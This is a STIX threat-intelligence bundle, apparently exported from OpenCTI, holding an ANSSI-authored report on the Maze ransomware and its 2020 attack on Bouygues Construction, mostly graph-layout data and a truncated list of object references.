{
"type": "bundle",
"id": "bundle--1e92024b-eb00-4a78-bcf2-b31d67c08a89",
"spec_version": "2.0",
"objects": [
{
"id": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"type": "identity",
"name": "ANSSI",
"identity_class": "organization",
"labels": [
"identity"
],
"created": "2019-04-26T11:54:44.000Z",
"modified": "2019-04-26T11:54:44.000Z",
"x_opencti_organization_class": "csirt",
"x_opencti_identity_type": "organization",
"x_opencti_id": "09baf6bd-ae68-38cd-96b7-05f3a6e4a60e"
},
{
"id": "marking-definition--f814dace-5888-4848-ab23-326518531d3e",
"type": "marking-definition",
"definition_type": "TLP",
"definition": {
"TLP": "TLP:WHITE"
},
"created": "2019-04-15T16:50:04.000Z",
"x_opencti_modified": "2019-04-15T16:50:04.000Z",
"x_opencti_id": "29d02f65-ba2f-3da9-9878-52950ef5a617"
},
{
"id": "report--24854f15-ab94-4adc-81d0-f08a420167c2",
"type": "report",
"name": "Maze report",
"labels": [
"report"
],
"description": "Maze ransomware has been discovered in May 2019. it is known to be associated with data leaks in Internet. By this mean, some of the Threat Actors using Maze have chosen to put more pressure on victims. Leaked datas are uploaded on the website mazenews.top. In France, a part of Bouygues Construction company's networks has been compromised by Maze in january 2020. Threat Actor claimed to have ask for 10 millions dollars of ransom.",
"published": "2020-02-04T00:00:00.000Z",
"created": "2020-02-04T14:16:03.574Z",
"modified": "2020-02-05T10:32:21.843Z",
"x_opencti_report_class": "Threat Report",
"x_opencti_object_status": 2,
"x_opencti_source_confidence_level": 3,
"x_opencti_graph_data": "{"nodes":{"14db3816-53db-4811-ba6e-586426ae59b8":{"position":{"x":2150,"y":185}},"6fb84f02-f095-430e-87a0-394d41955eee":{"position":{"x":815,"y":185}},"947af535-64e2-4c0d-8b60-980d2633c014":{"position":{"x":1055,"y":185}},"867d03f4-be73-44f6-82d9-7d7b14df55d7":{"position":{"x":2250,"y":0}},"835859b1-0bb9-4ec5-b7d7-c37f28747a0b":{"position":{"x":1485,"y":0}},"b268e4f0-e820-49c7-b441-015c543db252":{"position":{"x":6362.5,"y":370}},"ff44ba3e-2409-42b9-b523-24a70e1176ae":{"position":{"x":3857.5,"y":370}},"09c0f17d-4276-4a24-9b32-acf777ba6af4":{"position":{"x":3617.5,"y":370}},"b0ac41fa-ef97-462e-a90a-74e97b8be36b":{"position":{"x":350,"y":0}},"b57e5c0d-0b3e-41d9-8155-b045736f47f4":{"position":{"x":625,"y":370}},"dd843665-374a-4f2c-a2fc-70f850a2fc95":{"position":{"x":3357.5,"y":370}},"fab78d2b-3759-4c12-940b-7814aa78aec7":{"position":{"x":2892.5,"y":370}},"f9abec3e-0531-4be4-a91e-f2ff6fd9c26b":{"position":{"x":4442.5,"y":370}},"a70839c5-e68b-4d03-bd51-916e42ac9e79":{"position":{"x":4592.5,"y":0}},"8c9ae84e-6f6a-4414-aca0-7159260e359f":{"position":{"x":4802.5,"y":370}},"725af09e-714a-45a8-8c38-9aec63b7c3f3":{"position":{"x":4262.5,"y":370}},"a0ab295e-7da9-4eb1-8b77-10a956895038":{"position":{"x":935,"y":0}},"d43a1099-26bf-4fa0-ac36-3a22271c4284":{"position":{"x":7642.5,"y":370}},"95ecd5fe-d3bc-4f8d-90c9-ddc077ab38c6":{"position":{"x":7357.5,"y":370}},"882eece0-0a2d-4308-af27-3b50dc794131":{"position":{"x":4982.5,"y":370}},"5c71fd50-3989-4a2b-8c2b-a25515adbfa3":{"position":{"x":7452.5,"y":0}},"9f32bb2e-0f75-47d9-88d4-1923e538b9e4":{"position":{"x":9252.5,"y":0}},"f2f46567-5d11-4af4-851f-81aa2a0f9073":{"position":{"x":9012.5,"y":0}},"d23c7c16-70d4-40e6-a652-9df274007131":{"position":{"x":8892.5,"y":0}},"e0488d1d-a872-4a82-9f14-d408ec468774":{"position":{"x":7332.5,"y":0}},"f669ccd2-d5f8-4544-a8a3-b09845e73768":{"position":{"x":9852.5,"y":0}},"ea0bd5e6-0dd3-4582-ab6b-81bf69923bd3":{"position":{"x":8652.5,"y":0}},"4013a3c4-2f41-4879-a889-adfa2226294b"
:{"position":{"x":9732.5,"y":0}},"c02b5af3-6cd4-4920-892e-d9217e7ad432":{"position":{"x":7932.5,"y":0}},"14b23d2a-1cf9-4220-80ac-0a0eac87d2ac":{"position":{"x":9612.5,"y":0}},"eff25a89-e31d-4e7e-b3e2-4333a2928305":{"position":{"x":8532.5,"y":0}},"595a9e9c-ad80-4f78-b441-f34585aa9464":{"position":{"x":9492.5,"y":0}},"40dc5b4b-1530-4d79-a7b5-0a7b670487e3":{"position":{"x":8412.5,"y":0}},"017ccfd2-0c45-4545-b8c5-297a572a6477":{"position":{"x":5102.5,"y":370}},"b00d476e-04d3-4433-9e85-b1396c25fc64":{"position":{"x":5222.5,"y":370}},"027e5f0c-bcb5-43f3-a877-f45b3cb78caf":{"position":{"x":5342.5,"y":370}},"fa0766e7-718a-459b-bbfd-74494abad0cc":{"position":{"x":5462.5,"y":370}},"ca2e5139-2219-41ef-98d0-c8106ab6e0be":{"position":{"x":5582.5,"y":370}},"a5bff540-0fcd-4c16-98db-ab257490f48c":{"position":{"x":5702.5,"y":370}},"24b8c018-62d6-448a-a90c-22d51238d86e":{"position":{"x":5822.5,"y":370}},"d92a768b-489d-4efa-b6f5-e0d51b5ed4b2":{"position":{"x":5942.5,"y":370}},"f9a3c7db-da7c-49eb-9208-7e83caabb5ee":{"position":{"x":6062.5,"y":370}},"529e8fc9-36fc-46a0-8112-c7c5b15d6558":{"position":{"x":6182.5,"y":370}},"ad30c082-466b-4121-b175-9b90516797a2":{"position":{"x":5282.5,"y":555}},"8e021cff-aee9-48cf-b743-dab24853d545":{"position":{"x":7212.5,"y":0}},"45d92f72-a4a1-43c0-88ff-802c0e44a2fa":{"position":{"x":8292.5,"y":0}},"93e9f9fc-b19d-46b5-a177-a154adfcc626":{"position":{"x":7092.5,"y":0}},"3a2c9e94-1de8-4abb-ab5c-5e0b7d43611d":{"position":{"x":7812.5,"y":0}},"069a7607-178b-4824-b968-4bb96cfdf89a":{"position":{"x":8172.5,"y":0}},"3aa96da6-a5b8-4706-a668-27ad85b35970":{"position":{"x":7692.5,"y":0}},"c9831390-4675-4197-a60b-87b36fb047aa":{"position":{"x":8772.5,"y":0}},"b3ee4932-cd66-4ad8-956e-3a6f3d88eaee":{"position":{"x":6972.5,"y":0}},"b1614f93-a023-4e53-89a7-e6fb5bbcf5fe":{"position":{"x":6852.5,"y":0}},"b9c42a28-354a-4823-ac09-d78f57f96ad3":{"position":{"x":8052.5,"y":0}},"b0249350-5f68-4650-b226-f5508fcb270d":{"position":{"x":9132.5,"y":0}},"c7252593-79e1-465a-a398-cde
1b8d192a0":{"position":{"x":7572.5,"y":0}},"20442013-02a9-42ee-8b5c-f031503ed936":{"position":{"x":9372.5,"y":0}},"99598776-0b84-433b-8128-3474999b4955":{"position":{"x":6732.5,"y":0}},"cdf8c45a-ee5d-325b-b1a5-b12899359e97":{"position":{"x":1232.5,"y":185}},"d83a4231-2314-315d-abc4-6c6574257dbf":{"position":{"x":2385,"y":185}},"6ab2aae8-dbcc-3f4d-9d80-a4b3fb7e68e4":{"position":{"x":1992.5,"y":185}},"34e9d31a-60d5-32da-89ab-bb7b876789ab":{"position":{"x":1732.5,"y":185}},"780ba549-6fd2-4a15-8db0-edb0507ff872":{"position":{"x":8552.5,"y":740}},"e7c0fb6c-dc23-4a1e-ba65-73b39b8ed370":{"position":{"x":6152.5,"y":740}},"5774b873-60d8-3628-9a4b-9415e52101d4":{"position":{"x":8902.5,"y":740}},"7d00e1a3-a731-43d8-a39b-972381467380":{"position":{"x":8512.5,"y":555}},"e2753312-1090-492d-a8fd-56ca36675d35":{"position":{"x":3352.5,"y":555}},"9ca2ff43-b765-4f13-a213-10664a2ae8fc":{"position":{"x":7637.5,"y":555}},"5d42255b-32a0-48bb-9996-6700edb49574":{"position":{"x":8797.5,"y":555}},"be1d7745-bd73-4763-93cc-34928036caa3":{"position":{"x":3112.5,"y":555}},"b62c846b-669d-4222-89c2-79722fa65587":{"position":{"x":315,"y":740}},"dab03369-f673-4fc1-ad48-159ae5ebfa6e":{"position":{"x":255,"y":555}},"a8dd629e-9bbb-43fc-a409-dc6d6e96e221":{"position":{"x":2732.5,"y":555}},"cab0b94e-b957-4f6d-a648-3d9323307f04":{"position":{"x":2387.5,"y":555}},"46444953-5f31-41b6-9839-da630822c59b":{"position":{"x":2387.5,"y":740}},"ba7a5f83-99d3-4c5a-a742-41f3674fe346":{"position":{"x":3937.5,"y":555}},"433161e8-7405-4ac0-812e-e398c930cc2e":{"position":{"x":4177.5,"y":555}},"8e78d78b-906c-35fd-bea8-dee3b69df22b":{"position":{"x":6262.5,"y":740}},"08670c23-5bdc-45b5-889c-9a87f976df6a":{"position":{"x":3697.5,"y":555}},"2ac90d70-72ee-30a9-8a8d-5f5b44e1bb00":{"position":{"x":8667.5,"y":740}},"d818aba6-0646-4678-9b52-1aebfb5281da":{"position":{"x":6042.5,"y":740}},"d0523f94-b69c-3114-8655-98c37bdf5a67":{"position":{"x":5932.5,"y":740}},"96e500e7-abfa-3847-8874-57c493cb27c9":{"position":{"x":195,"y":740}},"
6beae44c-2be7-315c-83f2-c0b4b0b4e4d6":{"position":{"x":3162.5,"y":740}},"daf1af32-6ac5-42f8-a92c-fe6238d758d4":{"position":{"x":2622.5,"y":740}},"e8c239ed-a248-4916-9e8f-0be1f4678639":{"position":{"x":2867.5,"y":740}},"c8c32fa5-576a-328d-b8b3-fb6d8a8d5355":{"position":{"x":5817.5,"y":740}},"e3660e35-a97d-381d-8ce9-692f3ad44f3e":{"position":{"x":9077.5,"y":740}},"05989a20-6925-4657-94a7-bea5d945aa25":{"position":{"x":8682.5,"y":370}},"a615bbcf-bb97-4d3e-8d5b-748cd7519acd":{"position":{"x":8387.5,"y":185}},"7f88e39a-bc1a-41fa-b78f-20b90f423f2a":{"position":{"x":6607.5,"y":110}},"ace44529-755b-4ab6-9a7e-886211b34f4a":{"position":{"x":6537.5,"y":480}},"776cb63b-5e77-411e-86ad-740e1725b6bf":{"position":{"x":6357.5,"y":295}},"24401885-fef3-425a-b65b-6857589ce2e6":{"position":{"x":9072.5,"y":665}},"dfb7c972-509e-4f3b-a5c5-2dfb902810d9":{"position":{"x":310,"y":665}},"15242c25-8906-4223-9b28-b60fe66bd6ae":{"position":{"x":4797.5,"y":295}},"6a9b457c-fe5b-4bbd-8512-9c4d8e1ac78b":{"position":{"x":5697.5,"y":480}},"e93b149f-8532-4104-808f-454bfc583011":{"position":{"x":690,"y":110}},"7e14df5c-c74d-401f-83e8-c39e29fb3111":{"position":{"x":1050,"y":110}},"2243b128-141d-45b2-8c9e-e5a17558b66a":{"position":{"x":8382.5,"y":665}},"c9bec55b-20ea-4008-9566-37c9eb278b0d":{"position":{"x":3347.5,"y":665}},"1ce495c3-e564-443e-bb60-719858aa05e9":{"position":{"x":3107.5,"y":665}},"0f956e4d-6967-4157-9e31-c76e8c738bf2":{"position":{"x":620,"y":295}},"185a4784-933c-4dbb-9430-443bf8b3e41c":{"position":{"x":2382.5,"y":665}},"5cd25a3b-801f-4882-a385-7b0e862e3dd0":{"position":{"x":4437.5,"y":295}},"9d19c35e-1aea-4fc0-9b5d-f2110d313a7b":{"position":{"x":3692.5,"y":665}},"0ae19019-5918-45ff-ba41-eb90e0d1a040":{"position":{"x":9847.5,"y":110}},"f91780d9-0343-4afb-a958-9d4f33e8ba24":{"position":{"x":9727.5,"y":110}},"47d655f0-37a1-4f88-9422-1815d03dcea5":{"position":{"x":9607.5,"y":110}},"ed925c59-4aa6-474d-bad4-a75a26ff0d34":{"position":{"x":9487.5,"y":110}},"96afe29a-c34c-47e9-9971-25c4c68e922e":{"
position":{"x":9367.5,"y":110}},"ffa10d8d-537b-40ac-a815-3833a6088277":{"position":{"x":1790,"y":110}},"ba4e7881-4f7c-46cf-9898-4b2e92e88da8":{"position":{"x":2627.5,"y":480}},"23b8a103-328c-4709-8b89-bcd576854631":{"position":{"x":550,"y":110}},"ec754648-ac4e-4f95-9b50-09b40d94211f":{"position":{"x":8667.5,"y":665}},"2cc2bcf8-ffff-4ee8-ad31-f62585c3d120":{"position":{"x":8502.5,"y":665}},"39ab5370-01de-4430-868e-7c9ae3feafbd":{"position":{"x":7627.5,"y":665}},"e644110c-4987-4d02-be42-7a9baf26151a":{"position":{"x":3852.5,"y":295}},"985c6abd-5fc7-408c-834d-adfd0dcbe7cb":{"position":{"x":3912.5,"y":480}},"838bc34a-4372-4aee-8c3d-a1cb15e3e651":{"position":{"x":3932.5,"y":665}},"1bba2fa9-17d0-4a77-a010-ecfef60e4990":{"position":{"x":9247.5,"y":110}},"7a52f2c1-5e9b-43c4-acc9-045bd9576fe7":{"position":{"x":5817.5,"y":480}},"4142c887-0f39-4521-8971-c5373deada6a":{"position":{"x":9127.5,"y":110}},"c97c9c83-e5dc-47f8-a3ec-3c287997fb1a":{"position":{"x":1670,"y":110}},"f509d225-f82b-4dce-9d29-9ec6c7bd9f87":{"position":{"x":8677.5,"y":295}},"4622fbab-2721-4118-92d0-c05c6ed52786":{"position":{"x":7507.5,"y":665}},"8ea0c05f-dc20-4d08-9506-ffd411761c6e":{"position":{"x":6417.5,"y":480}},"c171be3e-dd78-4012-ac09-bc21f1a440eb":{"position":{"x":8792.5,"y":665}},"8d27cea5-a656-449e-91a9-b2d1f4bd1fc5":{"position":{"x":3672.5,"y":480}},"c7cffb41-5953-4d29-9007-5eb20ceaf147":{"position":{"x":2947.5,"y":480}},"76df2a68-a3da-40e5-a03c-496284ed722f":{"position":{"x":4257.5,"y":480}},"2184aa69-9bb1-411b-ac8a-997fcbb7a1bb":{"position":{"x":9007.5,"y":110}},"34094eb4-aa91-47ad-8408-e68cb3c7b6d5":{"position":{"x":8887.5,"y":110}},"68b09d26-2acb-44d4-9f46-606a2126e8b5":{"position":{"x":8767.5,"y":110}},"32cc1b75-c06c-4496-8936-f5eab8abdc3c":{"position":{"x":2557.5,"y":110}},"ad4fdf09-8ac3-45e9-bc8a-f24870567555":{"position":{"x":1550,"y":110}},"8757c553-604a-43ab-8a4b-1c87af7ccbe4":{"position":{"x":1430,"y":110}},"8c135e8b-99ad-4d20-b2fd-018383275d63":{"position":{"x":2390,"y":110}},"b8fd5c74-
acea-4ba2-8c31-d0339619a94d":{"position":{"x":3612.5,"y":295}},"0a07f67c-0b0e-4afb-8cf7-d77d7a6eb2a4":{"position":{"x":3792.5,"y":480}},"8040f346-08e9-4a37-8447-59f7290ff66a":{"position":{"x":930,"y":110}},"a6c82516-0345-4334-b180-1798a0873646":{"position":{"x":4977.5,"y":480}},"ba3732c5-c652-4779-88d9-6ec4a0578209":{"position":{"x":8607.5,"y":480}},"a79c56bf-cbe1-46bc-8473-7e9a5a24ef86":{"position":{"x":8647.5,"y":110}},"7d2b2d7d-9190-4cc0-b817-ce364e9a9029":{"position":{"x":8527.5,"y":110}},"1165660f-1898-44a0-84be-97ca6ce8c35c":{"position":{"x":8407.5,"y":110}},"5b989d21-405d-418a-bf8c-209f4079ef72":{"position":{"x":5217.5,"y":480}},"ebdefda0-56fb-433b-bfea-64365bb5c6f1":{"position":{"x":5577.5,"y":480}},"408232ad-f2b2-4a3e-9990-1ac1873576a3":{"position":{"x":6177.5,"y":480}},"5b254d7d-3724-4da9-8048-49f4e3bad9f2":{"position":{"x":8287.5,"y":110}},"8fbb5920-0ec5-4ecc-9629-2850f1f528a8":{"position":{"x":8167.5,"y":110}},"b8dc512d-7d59-41b0-b4f0-d6dbdf28e4cd":{"position":{"x":7697.5,"y":480}},"9b9cee87-d817-4f42-a877-1ae083d55408":{"position":{"x":2270,"y":110}},"d2671217-cd63-4fab-ae5d-8f424e07ce3f":{"position":{"x":1360,"y":480}},"9b61352d-d22e-4062-8caf-9fb69245c0d6":{"position":{"x":4292.5,"y":665}},"a2e9cb49-ff37-4bfc-8843-08e6fdf1bfc5":{"position":{"x":7457.5,"y":480}},"d5305338-d7fd-469b-9e48-a73706ed2f1b":{"position":{"x":7292.5,"y":480}},"7afb1062-d2b7-4146-8285-c989b0521cd7":{"position":{"x":6297.5,"y":480}},"acec4cc4-7f3f-49dd-a8bf-d4c0d82688da":{"position":{"x":3227.5,"y":665}},"d16b43b6-a217-4a18-84a4-328acf76f3e2":{"position":{"x":2817.5,"y":480}},"2d660703-778b-4c55-99ac-63995adc2410":{"position":{"x":4172.5,"y":665}},"3865a11b-f6e8-4cee-adc6-69c6ef116cd0":{"position":{"x":5337.5,"y":480}},"ec3d24c8-27e1-4c76-9a82-9377ba8566b3":{"position":{"x":8047.5,"y":110}},"c4b1984f-740b-48e2-a7d6-0e444c6a89af":{"position":{"x":430,"y":110}},"c4911576-ec4a-49e0-b761-148ab081ada5":{"position":{"x":1290,"y":110}},"29eaad38-2732-4d7c-93c8-20e291036bfc":{"position":
{"x":3542.5,"y":110}},"6b3a78d1-9be4-48e0-9c02-184bc26357e9":{"position":{"x":930,"y":480}},"d745f008-6bc4-4dae-99bb-ceabae4908ca":{"position":{"x":4497.5,"y":480}},"e81dd45b-9c73-4795-8fe6-291d4662a2c0":{"position":{"x":7927.5,"y":110}},"5ffb5816-aa82-4e0f-85d4-009b67b9ce58":{"position":{"x":6057.5,"y":480}},"b73f0b15-28f5-4def-a22b-42d4bf5d3faf":{"position":{"x":7807.5,"y":110}},"f46d6742-7877-4c47-880e-889631dc93f9":{"position":{"x":7687.5,"y":110}},"f168affd-d0f3-4187-8071-5c30e39f4fb0":{"position":{"x":7567.5,"y":110}},"7d6a1270-be4c-4bb1-8daa-32726917315c":{"position":{"x":7577.5,"y":480}},"928981a4-6873-4181-a0aa-708335b50e81":{"position":{"x":2150,"y":110}},"3d1deeac-bb26-441a-8484-6dfccf9367b9":{"position":{"x":310,"y":110}},"71f29fa9-db84-4989-bb00-8c5e8aeede92":{"position":{"x":2030,"y":110}},"76ac45fd-4360-40e1-9f92-24d299d6649c":{"position":{"x":1170,"y":110}},"f91696bf-184b-4a79-9dfb-ca686295b116":{"position":{"x":3422.5,"y":110}},"cc0eacfa-cd0b-471f-85fd-41818be81b18":{"position":{"x":2847.5,"y":665}},"6dc1938e-b447-476f-bcf5-4396dd6477d1":{"position":{"x":560,"y":480}},"3dfc0e24-80a7-4382-a28c-f7bf9d31bdb2":{"position":{"x":190,"y":665}},"57750dd4-bacd-41d1-98e1-ea4d0a875a5f":{"position":{"x":3352.5,"y":295}},"445d4fa9-6b54-43d2-9fc5-68bae9c72fea":{"position":{"x":3422.5,"y":480}},"40ce522b-826e-4f43-ab1c-d8b207356546":{"position":{"x":3292.5,"y":480}},"d553ec01-a53d-42e3-bc04-3c415559e3d4":{"position":{"x":2727.5,"y":665}},"6bb2752c-b594-48a1-8cd4-6aabe28703ff":{"position":{"x":2887.5,"y":295}},"67a53793-568e-41a3-9e4f-643fd6848ecc":{"position":{"x":3812.5,"y":665}},"b327e979-78a5-42c5-8d8e-ddbedbe60087":{"position":{"x":4857.5,"y":480}},"e9379750-75d9-4fab-8a4b-043b72cbc18e":{"position":{"x":4052.5,"y":665}},"444d6f61-f7c7-47a2-9c23-543bea34a906":{"position":{"x":3467.5,"y":665}},"4ccff364-96c3-428c-9e0c-8e97f30819d9":{"position":{"x":7637.5,"y":295}},"df247c92-f9fb-4c18-9f00-09bd525a7527":{"position":{"x":7447.5,"y":110}},"996960b3-3816-4c6e-9207-
564118ac0f42":{"position":{"x":7327.5,"y":110}},"7259641f-362e-42c2-8fc1-e792982ff262":{"position":{"x":5097.5,"y":480}},"d6a52775-3cc9-410d-a11f-0f2bab644c2e":{"position":{"x":7207.5,"y":110}},"ff556562-0bd9-4ff8-a970-e58aa11bf35d":{"position":{"x":7087.5,"y":110}},"b788f395-1158-4b99-ad5d-7442603907ad":{"position":{"x":6967.5,"y":110}},"41d44006-f39d-4abe-94f8-609aa412261a":{"position":{"x":6847.5,"y":110}},"eddb7f37-83ea-4306-bf11-a90fc023ffcd":{"position":{"x":2817.5,"y":110}},"a43cf423-441f-48f3-8c56-6c9c55d2f5b9":{"position":{"x":190,"y":110}},"46c034d3-9d20-4478-acb2-9f72dcd43321":{"position":{"x":70,"y":110}},"f516fc10-0c0a-4bf6-9ac9-cdb0c6dde8d5":{"position":{"x":1910,"y":110}},"643db9b4-793e-4873-a355-8be957954b0e":{"position":{"x":2697.5,"y":110}},"fd1d72c9-8b7c-4d57-afba-6cc13d6e9117":{"position":{"x":0,"y":480}},"95a1cb81-cdd3-4b79-9f6d-48067182695b":{"position":{"x":810,"y":110}},"629459c6-c51b-4120-ae44-5fbacee22913":{"position":{"x":3542.5,"y":480}},"e029aeac-8880-4a58-bb86-5b4ed217a5db":{"position":{"x":2607.5,"y":665}},"2eb3c5a2-a0d2-4540-8107-b61c90e0dd2e":{"position":{"x":645,"y":665}},"5b686f15-7d54-43f8-8b0a-9b1281b3269c":{"position":{"x":4377.5,"y":480}},"7b123d30-b3d6-49d3-ae3d-8f2d81ed3795":{"position":{"x":4737.5,"y":480}},"0621c2e5-dce2-4aa2-8a6e-e8d5f5d3c063":{"position":{"x":7352.5,"y":295}},"4a6144a1-2445-42fd-a6ee-8d15e889f96d":{"position":{"x":5457.5,"y":480}},"f3b3e5d6-9527-46b5-88af-4b8047140b1c":{"position":{"x":5937.5,"y":480}},"6bb2c634-161d-4660-8c0b-4a2485bcc899":{"position":{"x":6727.5,"y":110}}},"zoom":15.407073709568579,"offsetX":-34.39033578514515,"offsetY":150.46069861812586}",
"x_opencti_id": "d999f711-aec1-4d1a-9579-2164e3468cb7",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"external_references": [
{
"id": "external-reference--bef3cce5-799d-4d16-ba41-94a6ce5cf84f",
"source_name": "CERT-FR",
"description": "Etat de la menace rançongiciel à l'encontre des entreprises et des institutions",
"url": "https://cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-001",
"external_id": "CERTFR-2020-CTI-001",
"x_opencti_id": "3d3d7150-8feb-49d2-83aa-e6ea747930f3",
"x_opencti_created": "2020-02-04T14:16:03.396Z",
"x_opencti_modified": "2020-02-04T14:16:03.396Z"
}
],
"object_refs": [
"malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"malware--c6006dd5-31ca-45c2-8ae0-4e428e712f88",
"malware--b03a728b-69c3-4734-a50e-94517938c419",
"campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"incident--82f427aa-7622-438f-9172-980fe432359c",
"incident--4707c654-4876-4897-9a3a-eae84858e199",
"incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"incident--c8f661b6-967f-40f5-9f3d-d51a9b2fbee7",
"campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"indicator--acc94099-0037-405e-9763-69fd0c2f1839",
"indicator--8895042c-7c13-4d86-a4de-6e8b560a0519",
"indicator--5b4eca1f-a30c-420c-845a-4f089934dcf2",
"indicator--783d7b92-5209-4bd5-844b-d594b6efda1c",
"indicator--94b5c744-b156-4208-ab8d-e28e1ec56eb9",
"indicator--6cf4aa42-fe72-4cb8-a91d-c54b09533a8d",
"indicator--48e335bc-734e-4bcb-b364-f24407be5ece",
"indicator--ab041af1-0ba0-4c62-b020-fcb43c0c42dc",
"indicator--2deec89a-2cf2-47b8-9fae-89a456d834d5",
"indicator--3a0ab761-cca4-4aec-b127-b103d978b7ed",
"indicator--dc5ead57-a56d-4a7c-b477-bf33c5828615",
"indicator--6e479260-bd34-45c4-802f-a236533127f0",
"indicator--8477d190-01fa-42d0-8c25-c6cb7b62e42a",
"indicator--07caf8e2-b8d1-43f3-a3f8-226ac17e604b",
"indicator--699fa50b-7154-4581-b5c4-cd62d8c04a7d",
"indicator--d0fe5c47-c5e9-4bbe-bc4f-937ebd16fcac",
"indicator--af485c23-5498-400b-ba25-e05a9a3a0198",
"indicator--614df552-e5e7-44b1-b473-22efdf5a1546",
"indicator--2442e818-ac39-4876-aaa0-bf0019f4b27b",
"indicator--f6ab57d7-06b3-4980-b6d0-8a4364eb5dd4",
"indicator--dcaa1087-87d2-410a-83aa-90c936afe3e4",
"indicator--4eef17b7-4ba6-46bc-8ed7-1a29826cf7b2",
"indicator--4a642ed5-f664-410a-b9b9-e7f0ab65bd18",
"indicator--7ca5ea6e-34a9-40cc-a4d8-61095f05777f",
"malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"indicator--4d3eb24a-9f23-48a8-9282-ec2987012725",
"indicator--da8c1488-3d95-44b6-9f56-03f9ab80a697",
"indicator--d7519fd7-a6f1-4c05-86b6-39397c61c5b5",
"indicator--2e21736d-afe6-410e-8e99-7eb93c0089fa",
"indicator--ebfc934d-56bf-4eb9-be0c-fdadb647afae",
"indicator--f20433f5-12e8-4cda-b752-630ca2d16852",
"indicator--69fdb470-d38d-405e-9ee3-364461504cf1",
"indicator--05024cf6-871c-4274-bc86-103dce87bab7",
"indicator--4f6cfd26-3328-40e5-90f7-e05d94fde810",
"indicator--f732504e-0cc0-4dce-b7e5-efab624f300c",
"indicator--cd96e384-82b5-409f-8984-afc26a55e1c0",
"indicator--8751d70a-582a-4cff-a1b6-a87717386606",
"indicator--20d5c6ac-ef7d-4cac-a941-104719daf80d",
"indicator--16c3d153-3516-4637-aba4-cccf05121fcd",
"attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"attack-patern--c8bd35e8-f4ad-4001-8440-51b91d37d947",
"attack-patern--d3828e37-fb36-4bbd-83be-1eacacaaec9e",
"identity--9dc270f2-416f-40aa-865a-cbf6e87a04a9",
"organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"identity--433d071c-42e4-41fa-915e-bad5a7473bd1",
"organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"identity--65463837-a41a-4b61-a074-b2f20f097555",
"organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"identity--f0e37b7a-93e9-4884-ac16-84cbcc1f0a2f",
"identity--700b77c4-6eb1-40b0-98c8-14d454638a9f",
"identity--23c518a8-e30c-4813-bcef-4001cd834929",
"identity--d2d2f930-4f0e-409b-9565-899ba3aba6af",
"identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"identity--f4c6843f-ed38-46e0-9e95-35c781f935b1",
"identity--5723cafe-2ef6-401c-a50b-0f0b754edb49",
"identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"identity--bb0a97dc-ae81-4c5e-9b56-3add2a980977",
"threat-actor--695dcd8f-53c8-45f6-b55a-3ae093d87f69",
"threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"relationship--19723a17-c942-4231-96f7-73db1c0d373b",
"relationship--940e927a-c350-495c-a612-96e91487c228",
"relationship--c9f8f9a4-024d-4c09-befd-d136554c1e04",
"relationship--aaa6aa7d-b035-4d85-bedc-be3091883fff",
"relationship--efa9ef88-96e7-43ed-95ce-52c2d23b617d",
"relationship--5df6632a-63b8-4e12-befc-32f74cf0c0bc",
"relationship--ce6959d6-e046-4bf7-96c7-1fd974c5ee8b",
"relationship--f89b7a83-518c-4711-b1a1-3b4632f6e91c",
"relationship--f4e9424b-417e-486b-81f3-e411f3fe779f",
"relationship--bd07e2f9-0e97-469d-825c-14f68d77c55f",
"relationship--3dcf9dd6-93c4-48ab-9828-b8bf7246b666",
"relationship--1630916b-cfe9-4f25-b96f-8694d5aa2bfa",
"relationship--02611de8-57da-42c4-a07f-b34b35ee599c",
"relationship--fad9e08f-fa22-4e36-9eec-1d3e099a99be",
"relationship--288794bd-993d-452b-b4ef-8e2c0239e772",
"relationship--ba8e9eeb-0e52-4e91-a5cc-6a1782d0056c",
"relationship--b57a8b86-24ef-433a-b7c7-c262e4345961",
"relationship--b2f5fb87-7e50-484f-8232-9f65c10b0058",
"relationship--d9fbecb8-530b-400d-a0f1-be1821f62e7e",
"relationship--e0ee6084-d4e6-4d01-9eb5-50ef1b975b79",
"relationship--9bdc2b8e-c0c7-4a19-bf1f-1859d0e6a7c3",
"relationship--0246b8d2-73ea-48fd-a888-b2afce788f1a",
"relationship--ce8eab1f-1c4d-4c3c-9cbd-1dc6ea25d566",
"relationship--33799534-2e54-4b00-bbf6-32be6359f7a6",
